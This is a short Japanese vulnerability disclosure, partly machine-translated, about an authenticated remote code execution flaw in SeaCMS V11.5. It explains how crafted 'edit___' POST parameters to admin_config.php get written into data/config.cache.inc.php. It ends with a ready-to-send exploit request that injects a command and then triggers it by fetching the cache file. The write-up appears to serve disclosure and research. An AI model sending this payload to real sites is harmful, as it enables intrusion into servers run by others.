Ocean CMS(seacms)V11.5コード実行の脆弱性
1.脆弱性の概要
Sea CMS(seacms)V11.5には、バックグラウンドで任意のコードが実行される脆弱性があります。
2.脆弱性の影響
seacms11.5
第三に、複製プロセス
脆弱性の場所
1wwvb5 \ admin_config.php(1wwvb5は、システムのインストール中にランダムに生成されるバックグラウンドディレクトリです)
対応するページ系统-> 网站设置 -> 模式路径设置
脆弱性分析
ファイルに書き込まれるファイル名は固定値(data / config.cache.inc.php)であるため、ファイルのコンテンツが制御可能かどうかに焦点を当てます。
ファイルの内容は、主に投稿で渡されたパラメータ名とパラメータ値に関連しており、$v
一部のフィルタリングでは、最初に無視して、ファイルで始まる$k
かどうかのみを判断します。edit___
そしてedit___
、後ろのヌル文字に置き換えます。
つまり、渡すedit___abc=1
と生成され$abc='123';
ます。こうすることで、悪意のあるコードを記述できます。
しかし、その間には回避する必要のある多くの判断があります。
実際、postによって渡されるパラメーターの名前に含める必要がedit___cfg_df_style、edit___cfg_df_html、edit___cfg_ads_dir、edit___cfg_upload_dir、edit___cfg_backup_dir
あり、それらの値は英数字の下線です。
エクスプロイト
1.悪意のあるファイルを生成する
GET:
http://127.0.0.1/1wwvb5/admin_config.php?dopost=save (1wwvb5为系统安装时随机产生的后台目录)
POST:
edit___cfg_df_style=1&edit___cfg_df_html=1&edit___cfg_ads_dir=1&edit___cfg_upload_dir=1&edit___cfg_backup_dir=1&edit___s;`calc`?>=a
2.生成された悪意のある構成ファイルにアクセスします(実際、多くのページには生成された構成ファイルが含まれています)
GET
http://127.0.0.1/data/config.cache.inc.php
正常にトリガーされました。
最後に、構成ファイルの特定の内容を確認できます。